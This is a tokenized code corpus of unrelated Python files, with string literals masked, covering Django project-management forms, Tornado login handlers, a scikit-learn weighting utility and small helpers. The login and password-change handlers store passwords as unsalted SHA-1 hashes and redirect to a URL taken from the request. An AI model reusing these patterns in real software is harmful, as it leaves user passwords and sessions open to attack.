} ) <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( { '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : reverse ( '<STR_LIT>' ) } ) <EOL> self . fields [ '<STR_LIT>' ] . queryset = Object . filter_permitted ( <EOL> user , Milestone . objects , mode = '<STR_LIT:x>' ) <EOL> self . fields [ '<STR_LIT>' ] . queryset = Object . filter_permitted ( <EOL> user , Task . objects , mode = '<STR_LIT:x>' ) <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . initial = <NUM_LIT:3> <EOL> self . fields [ '<STR_LIT>' ] . choices = ( ( <NUM_LIT:5> , _ ( '<STR_LIT>' ) ) , ( <EOL> <NUM_LIT:4> , _ ( '<STR_LIT>' ) ) , ( <NUM_LIT:3> , _ ( '<STR_LIT>' ) ) , ( <NUM_LIT:2> , _ ( '<STR_LIT>' ) ) , ( <NUM_LIT:1> , _ ( '<STR_LIT>' ) ) ) <EOL> self . fields [ '<STR_LIT>' ] . queryset = Object . filter_permitted ( <EOL> user , Task . objects , mode = '<STR_LIT:x>' ) <EOL> if parent : <EOL> self . fields [ '<STR_LIT>' ] . initial = parent . id <EOL> self . fields [ '<STR_LIT>' ] . initial = parent . project_id <EOL> if parent . milestone_id : <EOL> self . fields [ '<STR_LIT>' ] . initial = parent . milestone_id <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( <EOL> { '<STR_LIT:class>' : '<STR_LIT>' } ) <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( <EOL> { '<STR_LIT:class>' : '<STR_LIT>' } ) <EOL> if '<STR_LIT>' in kwargs : <EOL> instance = kwargs [ '<STR_LIT>' ] <EOL> if instance . start_date : <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( <EOL> { '<STR_LIT>' : instance . start_date . strftime ( '<STR_LIT:%s>' ) } ) <EOL> if instance . end_date : <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( <EOL> { '<STR_LIT>' : instance . end_date . strftime ( '<STR_LIT:%s>' ) } ) <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( { '<STR_LIT:class>' : '<STR_LIT>' } ) <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . help_text = _ ( "<STR_LIT>" ) <EOL> def old_save ( self , * args , ** kwargs ) : <EOL> "<STR_LIT>" <EOL> original = None <EOL> original_assigned = [ ] <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> try : <EOL> original = Task . objects . get ( pk = self . instance . id ) <EOL> original_assigned = list ( original . assigned . all ( ) ) <EOL> except Task . DoesNotExist : <EOL> pass <EOL> instance = super ( TaskForm , self ) . save ( * args , ** kwargs ) <EOL> if original : <EOL> new_assigned = list ( self . cleaned_data [ '<STR_LIT>' ] ) <EOL> if original_assigned != new_assigned : <EOL> for assignee in new_assigned : <EOL> self . instance . subscribers . add ( assignee ) <EOL> return instance <EOL> class Meta : <EOL> "<STR_LIT>" <EOL> model = Task <EOL> fields = ( '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT:status>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> class TaskTimeSlotForm ( ModelForm ) : <EOL> """<STR_LIT>""" <EOL> minutes = IntegerField ( widget = TextInput ( attrs = { '<STR_LIT:size>' : '<STR_LIT:5>' } ) ) <EOL> def __init__ ( self , user , task_id , * args , ** kwargs ) : <EOL> super ( TaskTimeSlotForm , self ) . __init__ ( * args , ** kwargs ) <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( <EOL> { '<STR_LIT:class>' : '<STR_LIT>' } ) <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( { '<STR_LIT:class>' : '<STR_LIT>' } ) <EOL> if '<STR_LIT>' in kwargs : <EOL> instance = kwargs [ '<STR_LIT>' ] <EOL> if instance . time_from : <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( <EOL> { '<STR_LIT>' : ( instance . time_from - datetime ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:1> ) ) . total_seconds ( ) } ) <EOL> if instance . time_to : <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( <EOL> { '<STR_LIT>' : ( instance . time_to - datetime ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:1> ) ) . total_seconds ( ) } ) <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( { '<STR_LIT:class>' : '<STR_LIT>' } ) <EOL> if '<STR_LIT>' in kwargs : <EOL> self . instance = kwargs [ '<STR_LIT>' ] <EOL> if self . instance . id : <EOL> del self . fields [ '<STR_LIT>' ] <EOL> else : <EOL> del self . fields [ '<STR_LIT>' ] <EOL> del self . fields [ '<STR_LIT>' ] <EOL> else : <EOL> del self . fields [ '<STR_LIT>' ] <EOL> del self . fields [ '<STR_LIT>' ] <EOL> def save ( self , * args , ** kwargs ) : <EOL> "<STR_LIT>" <EOL> if hasattr ( self , '<STR_LIT>' ) and self . instance . time_to and not self . instance . time_from : <EOL> minutes = long ( self . cleaned_data [ '<STR_LIT>' ] ) <EOL> hours = <NUM_LIT:0> L <EOL> days = <NUM_LIT:0> L <EOL> if minutes >= <NUM_LIT> : <EOL> hours = minutes // <NUM_LIT> <EOL> minutes %= <NUM_LIT> <EOL> if hours >= <NUM_LIT> : <EOL> days = hours // <NUM_LIT> <EOL> hours %= <NUM_LIT> <EOL> delta = timedelta ( days = days , hours = hours , minutes = minutes ) <EOL> self . instance . time_from = self . instance . time_to - delta <EOL> return super ( TaskTimeSlotForm , self ) . save ( * args , ** kwargs ) <EOL> class Meta : <EOL> "<STR_LIT>" <EOL> model = TaskTimeSlot <EOL> fields = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> class TaskStatusForm ( ModelForm ) : <EOL> """<STR_LIT>""" <EOL> name = CharField ( widget = TextInput ( attrs = { '<STR_LIT:size>' : '<STR_LIT>' } ) ) <EOL> def __init__ ( self , user , * args , ** kwargs ) : <EOL> super ( TaskStatusForm , self ) . __init__ ( * args , ** kwargs ) <EOL> self . fields [ '<STR_LIT:name>' ] . label = _ ( "<STR_LIT:Name>" ) <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> class Meta : <EOL> "<STR_LIT>" <EOL> model = TaskStatus <EOL> fields = ( '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> class FilterForm ( ModelForm ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , user , skip = None , * args , ** kwargs ) : <EOL> if skip is None : <EOL> skip = [ ] <EOL> super ( FilterForm , self ) . __init__ ( * args , ** kwargs ) <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> if '<STR_LIT>' in skip : <EOL> del self . fields [ '<STR_LIT>' ] <EOL> else : <EOL> self . fields [ '<STR_LIT>' ] . queryset = Object . filter_permitted ( <EOL> user , Contact . objects , mode = '<STR_LIT:x>' ) <EOL> self . fields [ '<STR_LIT>' ] . required = False <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( { '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : reverse ( '<STR_LIT>' ) } ) <EOL> self . fields [ '<STR_LIT:status>' ] . label = _ ( "<STR_LIT>" ) <EOL> if '<STR_LIT:status>' in skip : <EOL> del self . fields [ '<STR_LIT:status>' ] <EOL> else : <EOL> self . fields [ '<STR_LIT:status>' ] . queryset = Object . filter_permitted ( <EOL> user , TaskStatus . objects , mode = '<STR_LIT:x>' ) <EOL> self . fields [ '<STR_LIT:status>' ] . required = False <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( { '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : reverse ( '<STR_LIT>' ) } ) <EOL> if '<STR_LIT>' in skip : <EOL> del self . fields [ '<STR_LIT>' ] <EOL> else : <EOL> self . fields [ '<STR_LIT>' ] . help_text = "<STR_LIT>" <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> if '<STR_LIT>' in skip : <EOL> del self . fields [ '<STR_LIT>' ] <EOL> else : <EOL> self . fields [ '<STR_LIT>' ] . queryset = Object . filter_permitted ( <EOL> user , Project . objects , mode = '<STR_LIT:x>' ) <EOL> self . fields [ '<STR_LIT>' ] . required = False <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> if '<STR_LIT>' in skip : <EOL> del self . fields [ '<STR_LIT>' ] <EOL> else : <EOL> self . fields [ '<STR_LIT>' ] . queryset = Object . filter_permitted ( <EOL> user , Milestone . objects , mode = '<STR_LIT:x>' ) <EOL> class Meta : <EOL> "<STR_LIT>" <EOL> model = Task <EOL> fields = ( '<STR_LIT>' , '<STR_LIT:status>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> class TaskRecordForm ( ModelForm ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , user , * args , ** kwargs ) : <EOL> super ( TaskRecordForm , self ) . __init__ ( * args , ** kwargs ) <EOL> self . fields [ '<STR_LIT:body>' ] . required = True <EOL> self . fields [ '<STR_LIT:body>' ] . label = _ ( "<STR_LIT>" ) <EOL> class Meta : <EOL> "<STR_LIT>" <EOL> model = UpdateRecord <EOL> fields = [ '<STR_LIT:body>' ] </s>
<s> """<STR_LIT>""" <EOL> from django . conf . urls import patterns , url <EOL> urlpatterns = patterns ( '<STR_LIT>' , <EOL> url ( r'<STR_LIT>' , <EOL> '<STR_LIT:index>' , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> '<STR_LIT:index>' , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> from treeio . services . models import TicketQueue , TicketRecord <EOL> from django . core . urlresolvers import reverse <EOL> import datetime <EOL> def tickets_escalate ( ) : <EOL> "<STR_LIT>" <EOL> queues = TicketQueue . objects . filter ( <EOL> waiting_time__isnull = False , next_queue__isnull = False ) <EOL> now = datetime . datetime . now ( ) <EOL> for queue in queues : <EOL> if queue . waiting_time and queue . next_queue : <EOL> delta = datetime . timedelta ( seconds = int ( queue . waiting_time ) ) <EOL> timeframe = now - delta <EOL> tickets = queue . ticket_set . filter ( <EOL> date_created__lt = timeframe , status__active = True ) <EOL> for ticket in tickets : <EOL> updates = ticket . updates . filter ( <EOL> date_created__gte = timeframe ) . exists ( ) <EOL> if not updates : <EOL> ticket . queue = queue . next_queue <EOL> ticket . auto_notify = False <EOL> ticket . save ( ) <EOL> record = TicketRecord ( record_type = '<STR_LIT>' ) <EOL> record . format_message = '<STR_LIT>' + reverse ( '<STR_LIT>' , args = [ queue . id ] ) + '<STR_LIT>' + unicode ( queue ) + '<STR_LIT>' + reverse ( '<STR_LIT>' , args = [ queue . next_queue . id ] ) + '<STR_LIT>' + unicode ( queue . next_queue ) + '<STR_LIT>' <EOL> record . author = ticket . creator <EOL> record . save ( ) <EOL> record . about . add ( ticket ) <EOL> ticket . set_last_updated ( ) </s>
<s> from whirlwind . core . request import BaseRequest <EOL> from whirlwind . db . mongo import Mongo <EOL> from application . models . user import User <EOL> import datetime , hashlib <EOL> from tornado . web import authenticated <EOL> from whirlwind . view . decorators import route <EOL> @ route ( '<STR_LIT>' ) <EOL> class LogoutHandler ( BaseRequest ) : <EOL> def get ( self ) : <EOL> self . session [ '<STR_LIT:username>' ] = None <EOL> self . session . destroy ( ) <EOL> self . redirect ( "<STR_LIT:/>" ) <EOL> @ route ( '<STR_LIT>' ) <EOL> class LoginHandler ( BaseRequest ) : <EOL> def get ( self ) : <EOL> template_values = { } <EOL> template_values [ '<STR_LIT>' ] = self . get_argument ( '<STR_LIT>' , '<STR_LIT:/>' ) <EOL> self . render_template ( '<STR_LIT>' , ** template_values ) <EOL> def post ( self ) : <EOL> username = self . get_argument ( "<STR_LIT:username>" , None ) <EOL> password = self . get_argument ( "<STR_LIT:password>" , None ) <EOL> if not username or not password : <EOL> self . flash . error = "<STR_LIT>" <EOL> self . redirect ( "<STR_LIT>" ) <EOL> return <EOL> pw = hashlib . sha1 ( password ) . hexdigest ( ) <EOL> username = User . normalize ( username ) <EOL> user = User . lookup ( username ) <EOL> if not user or user [ '<STR_LIT:password>' ] != pw : <EOL> self . flash . error = "<STR_LIT>" <EOL> self . redirect ( "<STR_LIT>" ) <EOL> return <EOL> if user . is_suspended ( ) : <EOL> self . flash . error = "<STR_LIT>" <EOL> self . redirect ( "<STR_LIT:/>" ) <EOL> return <EOL> user . history . last_login = datetime . datetime . utcnow ( ) <EOL> Mongo . db . ui . users . update ( { '<STR_LIT>' : username } , { <EOL> '<STR_LIT>' : { '<STR_LIT>' : user . history . last_login } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT:1> } <EOL> } ) <EOL> self . session [ '<STR_LIT:username>' ] = user . _id <EOL> if self . get_argument ( "<STR_LIT>" , False ) == "<STR_LIT>" : <EOL> self . session [ '<STR_LIT>' ] = True <EOL> self . set_current_user ( user ) <EOL> self . flash . notice = "<STR_LIT>" % user . _id <EOL> forwardUrl = self . get_argument ( '<STR_LIT>' , '<STR_LIT:/>' ) <EOL> self . redirect ( forwardUrl ) <EOL> @ route ( '<STR_LIT>' ) <EOL> class SignupHandler ( BaseRequest ) : <EOL> def get ( self ) : <EOL> template_values = { } <EOL> template_values [ '<STR_LIT>' ] = self . get_argument ( '<STR_LIT>' , '<STR_LIT:/>' ) <EOL> self . render_template ( '<STR_LIT>' , ** template_values ) <EOL> def post ( self ) : <EOL> username = self . get_argument ( "<STR_LIT:username>" , None ) <EOL> password = self . get_argument ( "<STR_LIT:password>" , None ) <EOL> if not username or not password : <EOL> self . flash . error = "<STR_LIT>" <EOL> self . redirect ( "<STR_LIT>" ) <EOL> return <EOL> if password != self . get_argument ( "<STR_LIT>" , None ) : <EOL> self . flash . error = "<STR_LIT>" <EOL> self . redirect ( "<STR_LIT>" ) <EOL> return <EOL> user = User . instance ( username , password ) <EOL> Mongo . db . ui . users . insert ( user ) <EOL> self . flash . info = "<STR_LIT>" <EOL> self . redirect ( "<STR_LIT>" ) <EOL> class PasswordChanger ( BaseRequest ) : <EOL> @ authenticated <EOL> def post ( self ) : <EOL> pw = hashlib . sha1 ( self . get_argument ( "<STR_LIT:password>" ) ) . hexdigest ( ) <EOL> if self . get_current_user ( ) [ '<STR_LIT:password>' ] != pw : <EOL> self . flash . error = "<STR_LIT>" <EOL> self . redirect ( "<STR_LIT>" ) <EOL> return <EOL> newPw = self . get_argument ( '<STR_LIT>' ) <EOL> newPw2 = self . get_argument ( '<STR_LIT>' ) <EOL> if newPw != newPw2 : <EOL> self . flash . error = "<STR_LIT>" <EOL> self . redirect ( "<STR_LIT>" ) <EOL> return <EOL> password = hashlib . sha1 ( newPw ) . hexdigest ( ) <EOL> Mongo . db . ui . users . update ( { '<STR_LIT>' : self . get_username ( ) } , { <EOL> '<STR_LIT>' : { '<STR_LIT:password>' : password } <EOL> } ) <EOL> self . flash . success = "<STR_LIT>" <EOL> self . redirect ( '<STR_LIT>' ) </s>
<s> from whirlwind . middleware . session . memcache import Session <EOL> from whirlwind . db . memcache_interface import Memcache <EOL> from tornado . options import options <EOL> class SessionMiddleware ( ) : <EOL> def __init__ ( self , request ) : <EOL> if options . memcache_host : <EOL> Memcache . create ( host = options . memcache_host ) <EOL> else : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> self . request = request <EOL> def request_hook ( self ) : <EOL> self . request . session = Session ( self . request ) <EOL> def response_hook ( self ) : <EOL> self . request . session . save ( ) <EOL> del self . request . session <EOL> def view_hook ( self , view ) : <EOL> view [ '<STR_LIT>' ] = self . request . session </s>
<s> import numpy as np <EOL> from sklearn . externals import six <EOL> from . fixes import in1d , bincount <EOL> def compute_class_weight ( class_weight , classes , y ) : <EOL> """<STR_LIT>""" <EOL> from sklearn . preprocessing import LabelEncoder <EOL> if class_weight is None or len ( class_weight ) == <NUM_LIT:0> : <EOL> weight = np . ones ( classes . shape [ <NUM_LIT:0> ] , dtype = np . float64 , order = '<STR_LIT:C>' ) <EOL> elif class_weight == '<STR_LIT>' : <EOL> le = LabelEncoder ( ) <EOL> y_ind = le . fit_transform ( y ) <EOL> if not all ( np . in1d ( classes , le . classes_ ) ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> recip_freq = <NUM_LIT:1.> / bincount ( y_ind ) <EOL> weight = recip_freq [ le . transform ( classes ) ] / np . mean ( recip_freq ) <EOL> else : <EOL> weight = np . ones ( classes . shape [ <NUM_LIT:0> ] , dtype = np . float64 , order = '<STR_LIT:C>' ) <EOL> if not isinstance ( class_weight , dict ) : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" % class_weight ) <EOL> for c in class_weight : <EOL> i = np . searchsorted ( classes , c ) <EOL> if classes [ i ] != c : <EOL> raise ValueError ( "<STR_LIT>" % c ) <EOL> else : <EOL> weight [ i ] = class_weight [ c ] <EOL> return weight <EOL> def compute_sample_weight ( class_weight , y , indices = None ) : <EOL> """<STR_LIT>""" <EOL> y = np . atleast_1d ( y ) <EOL> if y . ndim == <NUM_LIT:1> : <EOL> y = np . reshape ( y , ( - <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> n_outputs = y . shape [ <NUM_LIT:1> ] <EOL> if isinstance ( class_weight , six . string_types ) : <EOL> if class_weight != '<STR_LIT>' : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' % class_weight ) <EOL> elif ( indices is not None and <EOL> not isinstance ( class_weight , six . string_types ) ) : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' % class_weight ) <EOL> elif n_outputs > <NUM_LIT:1> : <EOL> if ( not hasattr ( class_weight , "<STR_LIT>" ) or <EOL> isinstance ( class_weight , dict ) ) : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if len ( class_weight ) != n_outputs : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> expanded_class_weight = [ ] <EOL> for k in range ( n_outputs ) : <EOL> y_full = y [ : , k ] <EOL> classes_full = np . unique ( y_full ) <EOL> classes_missing = None <EOL> if class_weight == '<STR_LIT>' or n_outputs == <NUM_LIT:1> : <EOL> class_weight_k = class_weight <EOL> else : <EOL> class_weight_k = class_weight [ k ] <EOL> if indices is not None : <EOL> y_subsample = y [ indices , k ] <EOL> classes_subsample = np . unique ( y_subsample ) <EOL> weight_k = np . choose ( np . searchsorted ( classes_subsample , <EOL> classes_full ) , <EOL> compute_class_weight ( class_weight_k , <EOL> classes_subsample , <EOL> y_subsample ) , <EOL> mode = '<STR_LIT>' ) <EOL> classes_missing = set ( classes_full ) - set ( classes_subsample ) <EOL> else : <EOL> weight_k = compute_class_weight ( class_weight_k , <EOL> classes_full , <EOL> y_full ) <EOL> weight_k = weight_k [ np . searchsorted ( classes_full , y_full ) ] <EOL> if classes_missing : <EOL> weight_k [ in1d ( y_full , list ( classes_missing ) ) ] = <NUM_LIT:0.> <EOL> expanded_class_weight . append ( weight_k ) <EOL> expanded_class_weight = np . prod ( expanded_class_weight , <EOL> axis = <NUM_LIT:0> , <EOL> dtype = np . float64 ) <EOL> return expanded_class_weight </s>
<s> from __future__ import unicode_literals <EOL> from django . contrib import admin <EOL> from django . contrib . auth . admin import UserAdmin <EOL> from django . contrib . auth . models import AbstractUser <EOL> class CustomUser ( AbstractUser ) : <EOL> pass <EOL> admin . site . register ( CustomUser , UserAdmin ) </s>
<s> try : <EOL> import grp <EOL> import pwd <EOL> except ImportError : <EOL> pass <EOL> import pip <EOL> import platform <EOL> import tempfile <EOL> import os <EOL> import getpass <EOL> def return_error ( facility , message = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> if facility : <EOL> facility ( message ) <EOL> else : <EOL> print ( message ) <EOL> def env ( ) : <EOL> """<STR_LIT>""" <EOL> p = { } <EOL> p [ '<STR_LIT>' ] = platform . platform ( ) or None <EOL> p [ '<STR_LIT>' ] = platform . python_version ( ) or None <EOL> try : <EOL> p [ '<STR_LIT>' ] = p [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> except TypeError : <EOL> p [ '<STR_LIT>' ] = None <EOL> p [ '<STR_LIT>' ] = '<STR_LIT:.>' . join ( platform . python_version ( ) . split ( '<STR_LIT:.>' ) [ <NUM_LIT:0> : <NUM_LIT:2> ] ) or None <EOL> p [ '<STR_LIT>' ] = [ "<STR_LIT>" % ( pkg . key , pkg . version ) for pkg in pip . get_installed_distributions ( ) ] <EOL> p [ '<STR_LIT>' ] = os . path . join ( os . path . expanduser ( '<STR_LIT>' ) ) <EOL> p [ '<STR_LIT>' ] = os . path . join ( p [ '<STR_LIT>' ] , '<STR_LIT>' ) or None <EOL> p [ '<STR_LIT>' ] = tempfile . gettempdir ( ) <EOL> try : <EOL> pwuid = pwd . getpwuid ( os . getuid ( ) ) <EOL> p [ '<STR_LIT>' ] = pwuid [ <NUM_LIT:2> ] <EOL> p [ '<STR_LIT>' ] = pwuid [ <NUM_LIT:3> ] <EOL> p [ '<STR_LIT>' ] = pwuid [ <NUM_LIT:0> ] <EOL> p [ '<STR_LIT>' ] = grp . getgrgid ( pwd . getpwnam ( p [ '<STR_LIT>' ] ) . pw_gid ) . gr_name <EOL> except NameError : <EOL> try : <EOL> p [ '<STR_LIT>' ] = getpass . getuser ( ) <EOL> except AttributeError : <EOL> p [ '<STR_LIT>' ] = None <EOL> finally : <EOL> p [ '<STR_LIT>' ] = p [ '<STR_LIT>' ] = p [ '<STR_LIT>' ] = None <EOL> if platform . system ( ) == '<STR_LIT>' : <EOL> try : <EOL> p [ '<STR_LIT:type>' ] = '<STR_LIT>' <EOL> p [ '<STR_LIT>' ] = platform . system_alias ( platform . system ( ) , platform . release ( ) , platform . mac_ver ( ) ) [ <NUM_LIT:0> ] or None <EOL> p [ '<STR_LIT>' ] = platform . mac_ver ( ) [ <NUM_LIT:0> ] or None <EOL> except Exception as e : <EOL> raise Exception ( '<STR_LIT>' . format ( e ) ) <EOL> elif platform . system ( ) == '<STR_LIT>' : <EOL> try : <EOL> dist_info = platform . linux_distribution ( ) <EOL> p [ '<STR_LIT:type>' ] = '<STR_LIT>' <EOL> p [ '<STR_LIT>' ] = dist_info [ <NUM_LIT:0> ] or None <EOL> p [ '<STR_LIT>' ] = dist_info [ <NUM_LIT:1> ] or None <EOL> except Exception as e : <EOL> raise Exception ( '<STR_LIT>' . format ( e ) ) <EOL> elif platform . system ( ) == '<STR_LIT>' : <EOL> try : <EOL> p [ '<STR_LIT:type>' ] = '<STR_LIT>' <EOL> p [ '<STR_LIT>' ] = str ( platform . system ( ) + platform . release ( ) ) or None <EOL> p [ '<STR_LIT>' ] = platform . win32_ver ( ) [ <NUM_LIT:0> ] or None <EOL> except Exception as e : <EOL> raise Exception ( '<STR_LIT>' . format ( e ) ) <EOL> else : <EOL> try : <EOL> dist_info = platform . linux_distribution ( ) <EOL> p [ '<STR_LIT>' ] = dist_info [ <NUM_LIT:0> ] or None <EOL> p [ '<STR_LIT:type>' ] = '<STR_LIT>' <EOL> p [ '<STR_LIT>' ] = dist_info [ <NUM_LIT:1> ] or None <EOL> except Exception as e : <EOL> raise NotImplementedError ( '<STR_LIT>' . format ( e ) ) <EOL> return p <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> print ( env ( ) ) </s>
<s> from itty import * <EOL> from tropo import Tropo , Session <EOL> @ post ( '<STR_LIT>' ) <EOL> def index ( request ) : <EOL> s = Session ( request . body ) <EOL> t = Tropo ( ) <EOL> t . say ( '<STR_LIT>' , _as = '<STR_LIT>' , voice = '<STR_LIT>' ) <EOL> json = t . RenderJson ( ) <EOL> print json <EOL> return json <EOL> run_itty ( ) </s>
<s> import types <EOL> from dopplr . basequery import BaseQuery <EOL> class MoreLikeThisQuery ( BaseQuery ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , fields , mintf = None , mindf = None , minwl = None , maxwl = None , <EOL> maxqt = None , maxntp = None , boost = False , qf = None , count = None , <EOL> stream_body = None ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( fields , types . ListType ) : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> self . _fields = fields <EOL> self . _optional_params = { } <EOL> self . _optional_params [ '<STR_LIT>' ] = mintf <EOL> self . _optional_params [ '<STR_LIT>' ] = mindf <EOL> self . _optional_params [ '<STR_LIT>' ] = minwl <EOL> self . _optional_params [ '<STR_LIT>' ] = maxwl <EOL> self . _optional_params [ '<STR_LIT>' ] = maxqt <EOL> self . _optional_params [ '<STR_LIT>' ] = maxntp <EOL> self . _optional_params [ '<STR_LIT>' ] = boost <EOL> self . _optional_params [ '<STR_LIT>' ] = qf <EOL> self . _optional_params [ '<STR_LIT:count>' ] = count <EOL> self . stream_body = stream_body <EOL> def get_params ( self ) : <EOL> """<STR_LIT>""" <EOL> params = [ ] <EOL> params . append ( ( '<STR_LIT>' , '<STR_LIT:true>' ) ) <EOL> params . append ( ( '<STR_LIT>' , '<STR_LIT:U+002C>' . join ( self . _fields ) ) ) <EOL> for optional in self . _optional_params : <EOL> if self . _optional_params [ optional ] : <EOL> params . append ( ( '<STR_LIT>' % optional , <EOL> self . _optional_params [ optional ] ) ) <EOL> if self . stream_body : <EOL> params . append ( ( '<STR_LIT>' , self . stream_body ) ) <EOL> return params </s>
<s> """<STR_LIT>""" <EOL> from datetime import datetime , timedelta <EOL> from functools import wraps <EOL> def cache_key ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> key = "<STR_LIT>" <EOL> for arg in args : <EOL> if callable ( arg ) : <EOL> key += "<STR_LIT>" % repr ( arg ) <EOL> else : <EOL> key += "<STR_LIT>" % str ( arg ) <EOL> return key <EOL> class Cache ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ttl , cbname = "<STR_LIT>" , cache_key_method = cache_key ) : <EOL> self . ttl = ttl <EOL> self . cbname = cbname <EOL> self . cache_key_method = cache_key_method <EOL> self . cache = dict ( ) <EOL> self . func = None <EOL> def __call__ ( self , func ) : <EOL> self . func = func <EOL> @ wraps ( func ) <EOL> def _inner_func ( * args , ** kwargs ) : <EOL> self . _cached_func ( * args , ** kwargs ) <EOL> return _inner_func <EOL> def _cached_func ( self , * args , ** kwargs ) : <EOL> cb = kwargs . get ( self . cbname ) <EOL> key = self . cache_key_method ( * args , ** kwargs ) <EOL> if key in self . cache : <EOL> ( cached_result , exp_time ) = self . cache [ key ] <EOL> if exp_time > datetime . now ( ) : <EOL> cb ( cached_result ) <EOL> return <EOL> kwargs [ self . cbname ] = self . _caching_callback ( key , cb ) <EOL> self . func ( * args , ** kwargs ) <EOL> def _caching_callback ( self , key , callback ) : <EOL> def _inner_cache ( result ) : <EOL> self . cache [ key ] = ( result , datetime . now ( ) + self . ttl ) <EOL> callback ( result ) <EOL> return _inner_cache </s>
